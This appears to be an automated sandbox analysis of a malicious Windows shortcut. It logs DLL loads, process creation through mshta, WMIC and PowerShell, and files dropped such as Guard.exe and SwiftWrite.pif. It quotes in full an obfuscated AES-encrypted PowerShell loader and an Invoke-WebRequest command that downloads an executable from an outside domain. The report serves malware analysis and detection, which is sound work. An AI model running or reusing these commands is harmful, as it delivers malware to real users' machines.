Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll
Source: C:\Users\Public\Guard.exe	Section loaded: wsock32.dll
Source: C:\Users\Public\Guard.exe	Section loaded: version.dll
Source: C:\Users\Public\Guard.exe	Section loaded: winmm.dll
Source: C:\Users\Public\Guard.exe	Section loaded: mpr.dll
Source: C:\Users\Public\Guard.exe	Section loaded: wininet.dll
Source: C:\Users\Public\Guard.exe	Section loaded: iphlpapi.dll
Source: C:\Users\Public\Guard.exe	Section loaded: userenv.dll
Source: C:\Users\Public\Guard.exe	Section loaded: uxtheme.dll
Source: C:\Users\Public\Guard.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Guard.exe	Section loaded: windows.storage.dll
Source: C:\Users\Public\Guard.exe	Section loaded: wldp.dll
Source: C:\Users\Public\Guard.exe	Section loaded: napinsp.dll
Source: C:\Users\Public\Guard.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\Public\Guard.exe	Section loaded: wshbth.dll
Source: C:\Users\Public\Guard.exe	Section loaded: nlaapi.dll
Source: C:\Users\Public\Guard.exe	Section loaded: mswsock.dll
Source: C:\Users\Public\Guard.exe	Section loaded: dnsapi.dll
Source: C:\Users\Public\Guard.exe	Section loaded: winrnr.dll
Source: C:\Users\Public\Guard.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: twext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cscui.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Section loaded: rasadhlp.dll

Source: C:\Windows\System32\wbem\WMIC.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: tzA45NGAW4.lnk

LNK file: ..\..\..\..\..\Windows\System32\Wbem\wmic.exe

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: sethc.pdbGCTL source: mshta.exe, 00000006.00000003.1723263955.000001D24B8F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1727107670.000001D2479F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1722175831.000001D24BAAB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1732474910.000001D2479F4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1722175831.000001D24BA37000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1723381467.000001D2479F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1722645783.000001D24BAAC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1723149813.000001D24B9F4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1722333655.000001D247A7C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1722027418.000001D24B954000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1722518410.000001D24BA55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1723406104.000001D2479F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1722518410.000001D24BAAB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1735347435.000001D2479F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1724949762.000001D24B8D1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1732474910.000001D2479F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1722740168.000001D24BA75000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: .pdbGCTL source: mshta.exe, 00000006.00000002.1735347435.000001D2479B0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: sethc.pdb source: mshta.exe, 00000006.00000003.1723263955.000001D24B8F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1732474910.000001D2479F4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1723381467.000001D2479F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1723149813.000001D24B9F4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1722027418.000001D24B954000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1724949762.000001D24B8D1000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '9CF532B67986D916047FE0AC0764DA11DC4EADD5CE4C32A9EFBD866103824CD8010E51E35AA8431521E80FD6FD2B3D73241C0BB11F04EE49313A72FA43C65EE5DF342E50AAAB881EB97E2AD4046B96D04E64FD968C51007DBDB019561AAD993D9DDD6B0E95AAC81E269357C5BFEAEA2527E8A20F8FCEEE34F91F72675881E50DCD04295A790A9E13CE9CBF37B601B4FFAFE1D5CAC03DFDA56DCA95FF5424D15D2201EE63774AEF024E5D3441D0810D093A2A8E480D6D4B525FA6FC903E3BDB710FFAE3E893622CE5C8764591B00B8FC9C8100BDA923A83E6F8B88E69B0755D3228D1DC52C7C67BB3B24C6C30B777A5DDDC87AE8DF799E072F9A5A2E930038C7145315FA2576ADA033D15A7764469DE0BD65B7F9E89E55EA0317333FB845BB4339BA707D00A5B4FD12EF2BCA27548187BE559BD1E7662E4B6C54CE3999E1730EED4F58C611CC3B8C64086B0FF8A572FBC600798C70C4872E23D8DFEC08E57EC5BD8C46AD07560467116EEE5F8C78F0BB81E4E5B3A4C92473CAC6FC01E77EEA8F5860B14D885342EF00B915D9B9277B47DD62E92385866D4F08595B75FD3416076067E9C9C3A909D66C4807D3D34D802E94AFD77152A2E8719F1DB90EEEC5D5288DCDA7A440771A416DB8635C548C523B726DA123203E5BB32B7F0239E81E2E1C9948A2D9629655467B0C4210B5562746710458C26E13B06B0E5A0667F3D764E09D22E4F04DB3052359BDDB7C937C0FFC5E7B6BF7B398E140333E5B5B9741857518CBFC0A86CC2756344C085D6D9F6503AEF5967D61A95B8ED8B25A8DB23CFE55452E36DCEAB63EE4F1AA5BB09A1530D0D56F7123EA0E9278D6930295A53624251959B73A845ABD6AFC47B295DDF6B8083CD04B85C0789E0F09013BCBE631B9551A179D39DB7491A04A601C6E09CA8FF994D713877D75EA86A31FF9EC9B2C557BAE8C6A494EA46A84FC08A7DAC1B5ADDD84771E1AEFEEB3418328847AD5670D846972DBA8193DD696F0A22D11217E461ED7E46B33E2EF47F12B09657CB01CC3AE86335B6E69B306E63FDAC762CA62A91E39E7778E3A0CD5C1637FDF8E8F1AEAC86E8AA27EA3EBCD0BF91EFC1995D43D53A9537E8D0E5690CED64DD12BDF582DA4670F8EEC5BD3A43AC5AE823CFCDD2974718561BB5BE154E812A135FF700C05380B3B3283B4E089BA3450995E7D234293C2E6735402BE512FEF974C3031038C10F930900474FD65A4B2251379752BD260DCE20B2B16C34BB0B9B2D96015FEA98D2CA49F108194FF06C88A1B9C28318067753820430FCFFAE689D4A1AF2F1FA1E72325BC53D6460FFF8B5D895BAD7A4562A18E2129A5D836FCFF6CF002491AE00BA0D48891008E3FA63EE6F968719585482A9C78C05CD826A70C2500B84CD750008340587F705F63C221378C17C1FC4F620B61B035696056491071F78A3D4E95A1343424E7664744E454A61727570646663';function HUI ($CXfuOnjU){return -split ($CXfuOnjU -replace '..', '0x$& ')};$FMWRG = HUI($ddg.SubString(0, 2048));$oeC = [System.Security.Cryptography.Aes]::Create();$oeC.Key = HUI($ddg.SubString(2048));$oeC.IV = New-Object byte[] 16;$gVhTqzko = $oeC.CreateDecryptor();$JNWNnV = [System.String]::new($gVhTqzko.TransformFinalBlock($FMWRG, 0,$FMWRG.Length)); sal fd $JNWNnV.Substring(3,3); fd $JNWNnV.Substring(6)
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/kSMAbiand" -OutFile "C:\Users\Public\Guard.exe""
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '9CF532B67986D916047FE0AC0764DA11DC4EADD5CE4C32A9EFBD866103824CD8010E51E35AA8431521E80FD6FD2B3D73241C0BB11F04EE49313A72FA43C65EE5DF342E50AAAB881EB97E2AD4046B96D04E64FD968C51007DBDB019561AAD993D9DDD6B0E95AAC81E269357C5BFEAEA2527E8A20F8FCEEE34F91F72675881E50DCD04295A790A9E13CE9CBF37B601B4FFAFE1D5CAC03DFDA56DCA95FF5424D15D2201EE63774AEF024E5D3441D0810D093A2A8E480D6D4B525FA6FC903E3BDB710FFAE3E893622CE5C8764591B00B8FC9C8100BDA923A83E6F8B88E69B0755D3228D1DC52C7C67BB3B24C6C30B777A5DDDC87AE8DF799E072F9A5A2E930038C7145315FA2576ADA033D15A7764469DE0BD65B7F9E89E55EA0317333FB845BB4339BA707D00A5B4FD12EF2BCA27548187BE559BD1E7662E4B6C54CE3999E1730EED4F58C611CC3B8C64086B0FF8A572FBC600798C70C4872E23D8DFEC08E57EC5BD8C46AD07560467116EEE5F8C78F0BB81E4E5B3A4C92473CAC6FC01E77EEA8F5860B14D885342EF00B915D9B9277B47DD62E92385866D4F08595B75FD3416076067E9C9C3A909D66C4807D3D34D802E94AFD77152A2E8719F1DB90EEEC5D5288DCDA7A440771A416DB8635C548C523B726DA123203E5BB32B7F0239E81E2E1C9948A2D9629655467B0C4210B5562746710458C26E13B06B0E5A0667F3D764E09D22E4F04DB3052359BDDB7C937C0FFC5E7B6BF7B398E140333E5B5B9741857518CBFC0A86CC2756344C085D6D9F6503AEF5967D61A95B8ED8B25A8DB23CFE55452E36DCEAB63EE4F1AA5BB09A1530D0D56F7123EA0E9278D6930295A53624251959B73A845ABD6AFC47B295DDF6B8083CD04B85C0789E0F09013BCBE631B9551A179D39DB7491A04A601C6E09CA8FF994D713877D75EA86A31FF9EC9B2C557BAE8C6A494EA46A84FC08A7DAC1B5ADDD84771E1AEFEEB3418328847AD5670D846972DBA8193DD696F0A22D11217E461ED7E46B33E2EF47F12B09657CB01CC3AE86335B6E69B306E63FDAC762CA62A91E39E7778E3A0CD5C1637FDF8E8F1AEAC86E8AA27EA3EBCD0BF91EFC1995D43D53A9537E8D0E5690CED64DD12BDF582DA4670F8EEC5BD3A43AC5AE823CFCDD2974718561BB5BE154E812A135FF700C05380B3B3283B4E089BA3450995E7D234293C2E6735402BE512FEF974C3031038C10F930900474FD65A4B2251379752BD260DCE20B2B16C34BB0B9B2D96015FEA98D2CA49F108194FF06C88A1B9C28318067753820430FCFFAE689D4A1AF2F1FA1E72325BC53D6460FFF8B5D895BAD7A4562A18E2129A5D836FCFF6CF002491AE00BA0D48891008E3FA63EE6F968719585482A9C78C05CD826A70C2500B84CD750008340587F705F63C221378C17C1FC4F620B61B035696056491071F78A3D4E95A1343424E7664744E454A61727570646663';function HUI ($CXfuOnjU){return -split ($CXfuOnjU -replace '..', '0x$& ')};$FMWRG = HUI($ddg.SubString(0, 2048));$oeC = [System.Security.Cryptography.Aes]::Create();$oeC.Key = HUI($ddg.SubString(2048));$oeC.IV = New-Object byte[] 16;$gVhTqzko = $oeC.CreateDecryptor();$JNWNnV = [System.String]::new($gVhTqzko.TransformFinalBlock($FMWRG, 0,$FMWRG.Length)); sal fd $JNWNnV.Substring(3,3); fd $JNWNnV.Substring(6)	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/kSMAbiand" -OutFile "C:\Users\Public\Guard.exe""

Source: Ghep2712[1].6.dr

Static PE information: 0xDA18FDB4 [Thu Dec 13 08:35:00 2085 UTC]

Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe

Code function: 15_2_00007FF7A51A6D1C LoadLibraryA,GetProcAddress,

15_2_00007FF7A51A6D1C

Source: Ghep2712[1].6.dr

Static PE information: real checksum: 0x20826 should be: 0x6c486

Source: Ghep2712[1].6.dr

Static PE information: section name: .didat

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FF8879F05F0 push eax; retf	5_2_00007FF8879F05FD
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A51D78FD push rdi; ret	15_2_00007FF7A51D7904
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A51D7399 push rdi; ret	15_2_00007FF7A51D73A2
Source: C:\Users\Public\Guard.exe	Code function: 23_2_00918B75 push ecx; ret	23_2_00918B88
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Code function: 27_2_00158B75 push ecx; ret	27_2_00158B88
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Code function: 27_2_0014CBDB push eax; retf	27_2_0014CBF8

Persistence and Installation Behavior

Windows shortcut file (LNK) starts blacklisted processes

Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\mshta.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\SysWOW64\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\mshta.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\SysWOW64\cmd.exe

Creates processes via WMI

Source: C:\Windows\System32\wbem\WMIC.exe

WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create

Drops PE files with a suspicious file extension

Source: C:\Users\Public\Guard.exe

File created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif

Jump to dropped file

Source: C:\Users\Public\Guard.exe	File created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\Guard.exe	Jump to dropped file
Source: C:\Windows\System32\mshta.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\Ghep2712[1]	Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\Public\Guard.exe

Jump to dropped file

Source: C:\Windows\System32\mshta.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\Ghep2712[1]

Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\Public\Guard.exe

Jump to dropped file

